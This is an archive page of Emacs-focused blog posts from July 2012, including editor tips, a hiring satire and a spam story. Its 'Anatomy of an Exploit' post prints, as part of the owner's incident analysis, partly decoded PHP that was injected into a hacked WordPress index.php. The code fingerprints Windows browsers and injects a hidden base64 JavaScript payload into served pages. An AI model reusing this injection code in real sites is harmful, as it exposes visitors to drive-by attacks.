Malware Free

Posted on 2012-07-20 by jcs

I spent most of the day yesterday going over the entire site looking for malware. I made a local copy of irreal.org and grepped for the signatures that I discussed in my Anatomy of an Exploit post. I didn’t find anything so I used curl with the appropriate USER_AGENT string to request pages that Google said were infected. Again, I didn’t find anything so I asked Google to do a rescan and they agree that the site is clean.

As I wrote previously, I’ve upgraded WordPress and I’ve changed passwords so I don’t anticipate any further problems. As annoying as it was having Google flag the site, I’m grateful for them having alerted me—and you—to the problem.

Now back to our regularly scheduled blogging.

Posted in Administrivia | Tagged | Leave a comment

Anatomy of an Exploit

Posted on 2012-07-19 by jcs

As I wrote yesterday, someone hacked the Irreal WordPress installation causing it to inject JavaScript into pages served by the blog. Here’s a copy of the hacked index.php file: 

<?php eval(base64_decode('JGlwPSRfU0VSVkVS  /* elided */ );?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Importing that file into Emacs and using the base64-decode-region function, that first line turns out to be 

<?php
eval(base64_decode('$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua
= $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip)
=== false)){ error_reporting(0);
echo(base64_decode('PHNjcmlwdD50cnl7MS1wcm90b3R5 /* elided */ ); if
($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} }'));?>

I’m not a PHP or JavaScript programmer so I had to bootstrap my knowledge of C to figure out what’s going on. As you can see, the code checks to see if it’s running on a Windows machine that is using either Internet Explorer or Firefox and also makes a check on the file contents that I don’t understand. If those checks pass, it echos the payload onto the page. Notice that new call to base64_decode. When it’s decoded it expands to some byte-compiled JavaScript. I didn’t bother decompiling it because, as I say, I’m not a JS programmer and would only have a vague notion of what it was doing.

All of this was pretty easy to figure out once I got the index.php file into Emacs. As usual, it had all the tools I needed. I’m beginning to think that there might be something to the old joke that Emacs is not an editor, it’s an operating system.

Posted in General | Tagged , | 5 Comments

Malware Warnings

Posted on 2012-07-18 by jcs

Yesterday, Google started warning that the Irreal blog was unsafe. After some investigation, I determined that the site had, in fact, been compromised and some JavaScript that targeted Windows users (with the MSIE or Firefox browsers) was being served.

I have removed the exploit, upgraded WordPress to the latest version, and asked Google to rescan. As far as I know, everything is fine now. I’ll post in a day or two with some of the details.

Posted in Administrivia | Tagged | Leave a comment

Shift Select Mode

Posted on 2012-07-17 by jcs

I’m probably the last Emacs user to discover this but here’s a nifty trick that I learned today while trawling through some of Magnar Sveen’s .emacs.d files. If you hold down the shift key when moving the point, the region is extended. For example, if we have

the region is extended. For example,
      ^

with the point at the g in region and we type 【Shift+Meta+f】 3 times, we will have

gion is extended

selected. This is really handy for selecting a range of text, although to be fair, Sveen claims that true Emacs Knights don’t use this mode. He apparently prefers to use some of his finer grained extensions such as the expand-region package. I’ve also loaded that package and will write about it after I’ve used it for a while.

In the meantime, shift-select-mode seems like a handy feature to me. It’s enabled by default in Emacs 24 (at least) so you can try it out on any buffer you have open. You can read the documentation by asking for help on shift-select-mode.

Posted in General | Tagged | 1 Comment

Moving and Returning

Posted on 2012-07-16 by jcs

Xah Lee asks what’s the best way to jump to another position in a buffer and then return to the original point? Emacs users know a lot of ways of doing this. We can, for example, use 【Ctrl+s】 to move the new point and then 【Ctrl+x Ctrl+x】 to return or we can use any of the push and pop mark tricks that I and many others have written about.

Lee says he tried all those but that the thing that works best for him is to simply split the window, move to the new position in the window that still has focus and then close that window when he’s done. That way he’s back to where he started quickly and easily. What I like about that method is that it’s easy to remember. In theory I like the other methods but the 【Ctrl+x Ctrl+x】 sets a new region that has to be turned off and unless I use the push/pop mark methods all the time I tend to forget how to do it.

For small jumps, ace-jump-mode and then popping the mark with【Ctrl+u Ctrl+Space】 to return works well. A similar method using【Ctrl+s】 or【Ctrl+r】 followed by a【Ctrl+u Ctrl+Space】 also works for me. Those work because they push the mark before the jump. Methods that don’t do that are harder for me to use effectively. In those cases, Lee’s method feels like a win. What do the rest of you do?

Posted in General | Tagged | 5 Comments

Linum-mode

Posted on 2012-07-15 by jcs

This is another note to myself. Recently I was examining the internal structure of the decimal expansion of a number. In order to do this, I put the decimal representation of the number in a buffer and did a query-replace-regexp substituting <digit><space> for each <digit>. Then I set the fill column to 2 and did a refill. That gave me the number with each digit on a single line. I wanted to know the position of each digit. It’s easy to find that out by moving the point to the relevant line and, given that line-number-mode is on, just reading the line number from the mode line. But I wanted to see the positions for all the lines at once.

I knew there was a command to put each line’s number in the left fringe and had even used it but I couldn’t remember what it was. Furthermore, I couldn’t find it in the documentation. I tried things like apropos line and apropos number and other similar constructions but couldn’t find it. Eventually I gave up and started thinking about where I had first seen the command. It seemed to me that it was in an old Emacs-Fu post so I went to DJCB’s blog and did a search on “line number” and the correct post popped right up.

The right answer is linum-mode. The command name is suggestive of its function but it’s still hard to go from the functionality to the command’s name so I am documenting it here. It’s not a command that I use very often so it’s hard to remember its name but when you need it, nothing else will do.

Posted in General | Tagged | 3 Comments

Remote SUDO Access With Tramp

Posted on 2012-07-14 by jcs

I was reading some of the old posts from the excellent emacs-fu when I came across this post describing how to access root-owned files as a regular user. It was a nice post and cleared up an arcane piece of syntax that I never understood. In order to edit a root-owned file on the local host you enter something like:【Ctrl+x Ctrl+f/sudo::<path-to-root-owned-file>. The double colon seemed different from other similar constructs but all that’s happening is that /sudo:: is really just a shortcut for sudo‘s default, which is /sudo:root@localhost:.

That’s interesting and cleared up something that never made sense to me but the interesting lesson from the post occurred in the comments. One of the commenters complained that this still didn’t help with the common case of wanting to edit root files on a remote machine. If you try to do this, Emacs (Tramp, really) complains that sudo can only be used on the local host. However, it turns out that you can use the Tramp multihop facility to enable this functionality. This is explained in detail in the info page at Tramp > Configuration > Multi-hops, but the TL;DR is to add the three commands

(require 'tramp)
(add-to-list 'tramp-default-proxies-alist
             '(nil "\\`root\\'" "/ssh:%h:"))
(add-to-list 'tramp-default-proxies-alist
             '((regexp-quote (system-name)) nil nil))

to your .emacs or init.el file. Then you can edit remote root files with 【Ctrl+x ctrl+f/sudo:root@remote-host:<path-to-root-owned-file>.

Posted in General | Tagged | 3 Comments

Hiring Writers

Posted on 2012-07-13 by jcs

Hitesh Sarda has an amusing post on How I Hire Writers. Much has been written recently about the dysfunctional madness that is the tech hiring process. Sarda imagines the same process applied to writers applying, say, to a newspaper or magazine. Once you know the premise you can almost write the post yourself:

  • Offload the initial screening to HR by giving them relevant keywords such typing speed.
  • Have an initial screening phone interview in which they ask questions such as
    • Spelling of conscientious
    • Explanation of the Oxford comma
    • Asking the candidate to recite tongue twisters
  • Those candidates who pass the screening interview are invited to an on-site interview in which the interviewers dig deeply into
    • Knowledge of the Elements of Style
    • Spelling and grammar
    • Obscure facts about the areas in which they will be writing
    • Questions about word roots

When you see these tactics in an unfamiliar context their absurdity becomes obvious. Sadly, hiring managers are not apt to read Sarda’s post and if they do you can already imagine their explanations as to why they have to do things this way. No wonder so many people are starting their own businesses—anything would be better than going through this silliness.

Head on over and enjoy Sarda’s post. It will make your day.

Posted in General | Leave a comment

Emacs 24 ELPA Update

Posted on 2012-07-12 by jcs

In my ELPA With Emacs 24 post, I documented some of the problems I was having getting ELPA to work with Emacs 24 and showed some Elisp to work around the problem. Fortunately, my readers are a lot smarter than I am and suggested better ways of getting things to work.

The answer turns out to be pretty simple. I replaced all my special code for setting paths and requiring package with:

(package-initialize)
(add-to-list 'package-archives
             '("marmalade" . "http://marmalade-repo.org/packages/"))

and left everything else the same. So far that seems to be working perfectly. The documentation isn’t really clear on this and, in fact, hints that putting

(package-initialize)

in your .emacs or init.el file can cause problems with other packages. I haven’t seen that and neither have any of my commenters so unless I run into problems later, my recommendation is to simply add the package-initialize near the top of your .emacs or init.el.

None of this means, of course, that you won’t have to configure some of the packages you load with ELPA but at least Emacs won’t throw an error during startup because of missing packages. Thanks to Seth, Philipp, and Foo for their helpful comments.

Posted in General | Tagged | 1 Comment

You Can’t Make This Stuff Up

Posted on 2012-07-11 by jcs

Just when you think you’ve heard it all, we get a story like this. Scum spammers, masquerading as SEO consultants, have recently been flooding blogs with comment spam for an insurance agency in Australia. We here at Irreal get spam for similar (but not, apparently, the same) outfits on a regular basis.

Now Google has changed the rules a bit and fixed things so that “legacy spam” is actually damaging to the concerns that it was supposed to help. In response, the company has sent out emails asking (demanding?) that the blogs victimized on their behalf now remove these links (because they “may be harmful either to the future marketing and reputation of [our company] or our search results”) and to notify them when said links have been removed. I really wish that I had received one those emails but, sadly, I remove spam from the comments as they come in so I won’t have the opportunity to make a choice reply.

Josh Marshall of Talking Points Memo received one of these emails (see the story like this link) and summarized the situation as the company paying SEO consultants to spam blogs around the globe and then sending cease and desist notices when the scheme backfires. I’m not sure the email rises to the level of a cease and desist notice but it is rather demanding, especially in its insistence that the sender be notified when the links are removed.

If you were under the delusion that shameful behavior has boundaries, this story should disabuse you of the notion.

Posted in General | Tagged | Leave a comment